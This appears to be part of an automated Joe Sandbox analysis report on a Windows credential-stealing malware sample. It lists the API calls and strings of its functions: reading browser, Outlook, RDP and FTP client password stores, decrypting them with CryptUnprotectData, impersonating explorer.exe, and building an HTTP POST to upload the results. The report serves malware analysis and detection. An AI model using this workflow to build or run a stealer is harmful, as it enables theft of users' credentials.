                                  • Instruction Fuzzy Hash: 64C09B7210050C55C7017E25C905B9A7AD8575034CF40C1356605555B5D6B8D6E4C5D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,00000000,*.*,00000000), ref: 004098A2
                                  • lstrcmpiA.KERNEL32(00414F84,?), ref: 004098CF
                                  • lstrcmpiA.KERNEL32(00414F86,?), ref: 004098EC
                                  • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00414845,00000000,?,signons2.txt,00000000,?), ref: 00409A82
                                  • FindClose.KERNEL32(?,?,?,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00414845,00000000,?,signons2.txt,00000000), ref: 00409A95
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E19
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E23
                                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E37
                                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                  • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                  • API String ID: 3040542784-1405255088
                                  • Opcode ID: 5a10082d4a5fe8f446f7807e69872257aa5e5e3cf96e1615feb030826a84cb06
                                  • Instruction ID: 67051825bcad8824e2b937691ec5a4406eb7b4ce862c3ffcbd0e68b0dcec7392
                                  • Opcode Fuzzy Hash: 5a10082d4a5fe8f446f7807e69872257aa5e5e3cf96e1615feb030826a84cb06
                                  • Instruction Fuzzy Hash: A2513071941249BADF61BF61CC02EEE7A6AAF41308F1044BBB408711F2D6799ED0AE59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: explorer.exe
                                  • API String ID: 0-3187896405
                                  • Opcode ID: 218728443306cc9d00ae8efdbf020c82e4af88c1d60a6babb47cb0d0ca7da1f5
                                  • Instruction ID: 6cf2bdf8de8470b1e15b5c95fcd56135633905720b215610431ce2b02da368ac
                                  • Opcode Fuzzy Hash: 218728443306cc9d00ae8efdbf020c82e4af88c1d60a6babb47cb0d0ca7da1f5
                                  • Instruction Fuzzy Hash: F0313930A40208AADF229B61CD49BEE7BB4AB44344F1044B7E105B11E1DBB99FD5DF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (%e$123456
                                  • API String ID: 0-1815031084
                                  • Opcode ID: 6d3f3ac7ac699dd0c964d513ec5b732d6be89847b94946a09ea3017a56b5dc4e
                                  • Instruction ID: 162fa20a4eef0904e001b52781486bdd0e96aabe3a3ff4935987bad036a14f5f
                                  • Opcode Fuzzy Hash: 6d3f3ac7ac699dd0c964d513ec5b732d6be89847b94946a09ea3017a56b5dc4e
                                  • Instruction Fuzzy Hash: 59515C70904208EFEF119FA1DD86BEDBBB5EB04304F148066E610B91E1C7F99AD4DB29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                                    • Part of subcall function 0040A2A9: 757283B0.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2EB
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A58B
                                  • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A615
                                  • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A634
                                  • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A653
                                  • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A66C
                                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A6B2
                                  • LocalFree.KERNEL32(?), ref: 0040A6DF
                                  • 757283B0.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A709
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcmpi$757283ByteCharMultiWide$CryptDataFreeLocalUnprotect
                                  • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                  • API String ID: 627727140-3076635702
                                  • Opcode ID: eaa410cd3557ca0f5d1866dabd65e8512d62e6ee57f3ce4e09d03e50c75f8b7d
                                  • Instruction ID: d2a922008bdebd86f42a8708ca9441522aabe83a0fc08158bea3eb6d75d48dad
                                  • Opcode Fuzzy Hash: eaa410cd3557ca0f5d1866dabd65e8512d62e6ee57f3ce4e09d03e50c75f8b7d
                                  • Instruction Fuzzy Hash: A741187190021CEADF219E50CC42FDABAB9BF08304F04C0A6F644750D0DBB69AE59FD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BCED
                                  • LocalFree.KERNEL32(00000000,?), ref: 0040BD28
                                  • lstrlen.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD69
                                  • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD77
                                  • lstrlen.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD85
                                  • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD93
                                  • lstrlen.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDA1
                                  • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDAF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                  • String ID: ftp://$http://$https://
                                  • API String ID: 3968356742-2804853444
                                  • Opcode ID: da94ae7ce09f989e68583115b1b9dcefb83786a332561ab71f5bc2c108ef97c5
                                  • Instruction ID: e50de70f366a9a73352d6ba0206718c11b41da89e4af0f10d66e37424ec97bcb
                                  • Opcode Fuzzy Hash: da94ae7ce09f989e68583115b1b9dcefb83786a332561ab71f5bc2c108ef97c5
                                  • Instruction Fuzzy Hash: 8A51EB31910109FADF11AB91DC41EEEBB7AFF48318F14403AF611B11A1D7799A90DF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 004089D1
                                  • lstrcmpiA.KERNEL32(00414F84,?), ref: 004089FA
                                  • lstrcmpiA.KERNEL32(00414F86,?), ref: 00408A17
                                  • FindNextFileA.KERNEL32(?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 00408ABE
                                  • FindClose.KERNEL32(?,?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 00408AD1
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E19
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E23
                                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E37
                                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                  • String ID: *.*$\*.*
                                  • API String ID: 3040542784-1692270452
                                  • Opcode ID: 7bd5260f24fcfd03b54fc0410acff93605a8223c1715f3b4d02ae049ebe7587e
                                  • Instruction ID: 5ea2f1443042eb35dbb5eee109b5069dc3daeb25fe79f4f70908f7877fe18fba
                                  • Opcode Fuzzy Hash: 7bd5260f24fcfd03b54fc0410acff93605a8223c1715f3b4d02ae049ebe7587e
                                  • Instruction Fuzzy Hash: 6A317E70A00209AEDF10BF61CD42FEE7769AF40304F1041BBF458B51E2DB789AD1AE59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlen.KERNEL32(00000000,?,00100000,?,?), ref: 0040CEE2
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CF48
                                  • LocalFree.KERNEL32(00000000), ref: 0040CF6F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CryptDataFreeLocalUnprotectlstrlen
                                  • String ID: full address:s:$password 51:b:$username:s:
                                  • API String ID: 2920030623-2945746679
                                  • Opcode ID: 80dd475b6c2284031e2a326e643e6592a1ccc8b99b67c0a6f2d17358e0dd23f4
                                  • Instruction ID: 54cf008bb3eae58b1a30e6a5af3c8a5bf0615ee99b7eb6d7c5b05f7a3dd5831b
                                  • Opcode Fuzzy Hash: 80dd475b6c2284031e2a326e643e6592a1ccc8b99b67c0a6f2d17358e0dd23f4
                                  • Instruction Fuzzy Hash: FE414F3190010AEADF11ABE5C886BEEBF76EF44714F10423BE601711E1D7794A92DB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A9DF
                                  • lstrlenW.KERNEL32(00416369,?,?,00000000), ref: 0040AA1D
                                  • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AA4D
                                  • LocalFree.KERNEL32(00000000), ref: 0040AA7F
                                  • CredFree.ADVAPI32(00000000), ref: 0040AA9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                  • String ID: Microsoft_WinInet_*
                                  • API String ID: 3891647360-439986189
                                  • Opcode ID: e2cdd9777c561ac2bb41ebb2efe91c84cbc4f3f4b8840245c1f494ee64d6074b
                                  • Instruction ID: ec4eec63bcc124374d5f2d7e6b4d46d77861198517d8893598619f99e1c26cfb
                                  • Opcode Fuzzy Hash: e2cdd9777c561ac2bb41ebb2efe91c84cbc4f3f4b8840245c1f494ee64d6074b
                                  • Instruction Fuzzy Hash: 9C312D71A00209EADF21CF84DD05BEEB7B4EB44315F15443AE951B61D0D3BC9A94CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlen.KERNEL32(?), ref: 0040AB39
                                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                                  • LocalFree.KERNEL32(00000000), ref: 0040AC24
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CryptDataFreeLocalUnprotectlstrlen
                                  • String ID:
                                  • API String ID: 2920030623-0
                                  • Opcode ID: 8ced7b270599a442a698b67bcf776159539da192bf3b2bcea2e9b0b29e5cf48c
                                  • Instruction ID: 9475b3dff48bb3a680590f8f4b8fbf70d62397470b3612e928ce05771e3a80a2
                                  • Opcode Fuzzy Hash: 8ced7b270599a442a698b67bcf776159539da192bf3b2bcea2e9b0b29e5cf48c
                                  • Instruction Fuzzy Hash: C731C7776042099FEF209E58D844BCDB776EB85374F504133DB51A72C4D2BCAA92CA4E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404531
                                  • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040454D
                                  • FreeSid.ADVAPI32(?), ref: 00404561
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                  • String ID:
                                  • API String ID: 3429775523-0
                                  • Opcode ID: 215ca8e38a4b271ad3cee58523825795728ac6a35de670ecaf2f6a1a604882c9
                                  • Instruction ID: e42ff38ce7fd43cd37d3952dc6f34b3e9485a0eb1960dbb1a6bbd8e72996f532
                                  • Opcode Fuzzy Hash: 215ca8e38a4b271ad3cee58523825795728ac6a35de670ecaf2f6a1a604882c9
                                  • Instruction Fuzzy Hash: AA114470504249EEEB11CB94DC1DB9EBBF4AB50309F05C0B5D154AB2E1D3B9E908C7AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                                  • LocalFree.KERNEL32(00000000), ref: 0040445C
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CryptDataFreeLocalUnprotect
                                  • String ID:
                                  • API String ID: 1561624719-0
                                  • Opcode ID: 6e74fe00b55e7932f4a8f56ddd37455bc0ab8baf8583fb2bef727fa63ab50fae
                                  • Instruction ID: d6296d7f62e99f81d38af1605d697d2135ce95648fdc9c4461f15ac0c6790018
                                  • Opcode Fuzzy Hash: 6e74fe00b55e7932f4a8f56ddd37455bc0ab8baf8583fb2bef727fa63ab50fae
                                  • Instruction Fuzzy Hash: 0C112875A00218EBDF118E94DC44BDEBB74FB84361F448466FA21662D0C378AA40CB49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                                  • Instruction ID: 2545cf6bef447fb7225041bb1f3c9065af7e7a2ad6f25ff4df53b15ebc9ce0fc
                                  • Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                                  • Instruction Fuzzy Hash: 05121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24e81fb78ac354ee097640eab5717c4d3c17e347a3450a17031ab049b40a00ab
                                  • Instruction ID: a3ab7fe7015f67ee49eb8ee9fe6df9325a8b680d2dcb251794c37e3166a95e3c
                                  • Opcode Fuzzy Hash: 24e81fb78ac354ee097640eab5717c4d3c17e347a3450a17031ab049b40a00ab
                                  • Instruction Fuzzy Hash: 7B719237F506364BE7589DAA8881155F7A2ABC8320B5F827DCD19F7381C9B4BD12C6C4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                                  • API String ID: 0-1526611526
                                  • Opcode ID: 397f75e2d7c7ccb5a2519cc949b4853d8c70d788a84c881cb73acbae40f0e818
                                  • Instruction ID: 8ada1e9ecac2b6a16ee08af0ca764310d7711adbc3e5f5be3c6fd46ad6a69e20
                                  • Opcode Fuzzy Hash: 397f75e2d7c7ccb5a2519cc949b4853d8c70d788a84c881cb73acbae40f0e818
                                  • Instruction Fuzzy Hash: 6F912571910209EADF11AFA1CC46BEEBEB5AF44308F20443BF011722E2DBB94D91DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                                  • API String ID: 0-3560805513
                                  • Opcode ID: 9b48d4e90ca8a66f3dac64509fe01a277f807ba8c30389ee2143f8938912c709
                                  • Instruction ID: 0b43bc70ff64a1734e0ce49f563043eae91eb0b2240d540db883058d32c88b0f
                                  • Opcode Fuzzy Hash: 9b48d4e90ca8a66f3dac64509fe01a277f807ba8c30389ee2143f8938912c709
                                  • Instruction Fuzzy Hash: 02512870900109BADF11AFA1CD06AEE7F75AB54349F10443BB512B01E3D7B98EA1EA5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • wsprintfA.USER32 ref: 0040ACAA
                                  • wsprintfA.USER32 ref: 0040ACBD
                                  • wsprintfA.USER32 ref: 0040ACD0
                                  • wsprintfA.USER32 ref: 0040ACE3
                                  • wsprintfA.USER32 ref: 0040ACF6
                                  • wsprintfA.USER32 ref: 0040AD09
                                  • wsprintfA.USER32 ref: 0040AD1C
                                    • Part of subcall function 0040AB24: lstrlen.KERNEL32(?), ref: 0040AB39
                                    • Part of subcall function 0040AB24: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                                    • Part of subcall function 0040AB24: LocalFree.KERNEL32(00000000), ref: 0040AC24
                                    • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000,?,00409772,?,00000000,?,BEEF0000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004015D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                                  • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                                  • API String ID: 3846021373-1012938452
                                  • Opcode ID: 5798d18ee31c4a3c9dbffdb4d1b814573c72c824d51f5e0d0d986f6ed4fc5b0f
                                  • Instruction ID: 1bba98e3d6ebe3bfaf8854b06724a853d0d9b8747224fc931b02987156b93079
                                  • Opcode Fuzzy Hash: 5798d18ee31c4a3c9dbffdb4d1b814573c72c824d51f5e0d0d986f6ed4fc5b0f
                                  • Instruction Fuzzy Hash: 6861B532940208BAEF127FA1DC42EEDBA72AF04344F14853AF914741F1D77A5AA4EB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                                    • Part of subcall function 0040A2A9: 757283B0.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2EB
                                    • Part of subcall function 0040A2F4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A330
                                    • Part of subcall function 0040A2F4: 757283B0.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A339
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F58E
                                  • lstrcmpiA.KERNEL32(?,identification), ref: 0040F60E
                                  • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F623
                                  • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F646
                                  • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F665
                                  • lstrcmpiA.KERNEL32(?,identities), ref: 0040F684
                                  • 757283B0.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F6E5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcmpi$757283ByteCharMultiWide
                                  • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                  • API String ID: 70865654-4287852900
                                  • Opcode ID: 3e079a118821a1eb422a03cb6e865a4b487750d6a7496ae881f3e52e7b948b64
                                  • Instruction ID: 5defee22b8e27fb871682b6a3356ac2aeb954d56b4ddb1cb6db0f340d7122943
                                  • Opcode Fuzzy Hash: 3e079a118821a1eb422a03cb6e865a4b487750d6a7496ae881f3e52e7b948b64
                                  • Instruction Fuzzy Hash: FF416F7180021DABEF219F50CD41FDA7779BF05304F0045B6B604751E2DBB99AE99F98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrIA.SHLWAPI(?,explorer.exe), ref: 00402D7B
                                  • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe), ref: 00402D9F
                                  • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402DC9
                                  • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402DE1
                                  • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402DEE
                                  • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402E0F
                                  • CloseHandle.KERNEL32(?), ref: 00402E34
                                  • CloseHandle.KERNEL32(?,?), ref: 00402E3C
                                  • CloseHandle.KERNEL32(?), ref: 00402E46
                                  • Process32Next.KERNEL32(?,00000128), ref: 00402E58
                                  • CloseHandle.KERNEL32(?), ref: 00402E68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                  • String ID: explorer.exe
                                  • API String ID: 3144406365-3187896405
                                  • Opcode ID: 49e4cd7d7ed3542de117e9f293d799c5d97a6a6d7919811d6a423e5cfa3976f1
                                  • Instruction ID: 32ad39438d36eb2c4f1d55e69c665a30fc6644003667a0189b3d930331164acb
                                  • Opcode Fuzzy Hash: 49e4cd7d7ed3542de117e9f293d799c5d97a6a6d7919811d6a423e5cfa3976f1
                                  • Instruction Fuzzy Hash: 8F210031940118AADF219B61DD49BEEB7B4AB08344F1044F6E209B11E0DBB89FC5DF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004028FE: lstrlen.KERNEL32(?), ref: 00402932
                                  • StrStrIA.SHLWAPI(?,004164C1), ref: 0040BA50
                                  • lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040BA72
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcmpilstrlen
                                  • String ID: CONSTRAINT$origin_url$password_value$username_value
                                  • API String ID: 3649823140-2401479949
                                  • Opcode ID: 8f828f95b5369dd59e9ad301116de8a0485b61e87086effe206b5ffade53125d
                                  • Instruction ID: a2f71f728c42a4325fa4d28dd5602d5680443d2fae4c4e77b8657f15ca9af250
                                  • Opcode Fuzzy Hash: 8f828f95b5369dd59e9ad301116de8a0485b61e87086effe206b5ffade53125d
                                  • Instruction Fuzzy Hash: 9C111276310109B9CF116F25EC029DE7F91EB51398B008136F819A51E2D7F9DAE1AB9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403E58
                                  • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403E83
                                  • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403EC9
                                  • wsprintfA.USER32 ref: 00403EEE
                                    • Part of subcall function 00403DB7: 6F7013D0.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403DDC
                                  • lstrlen.KERNEL32(?,00001000,00001000,00001000), ref: 00403F19
                                  • closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403F64
                                  Strings
                                  • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403EE6
                                  • <, xrefs: 00403EA3
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$Crack$AllocCreateF7013Localclosesocketlstrlenwsprintf
                                  • String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                  • API String ID: 2517972182-2005047030
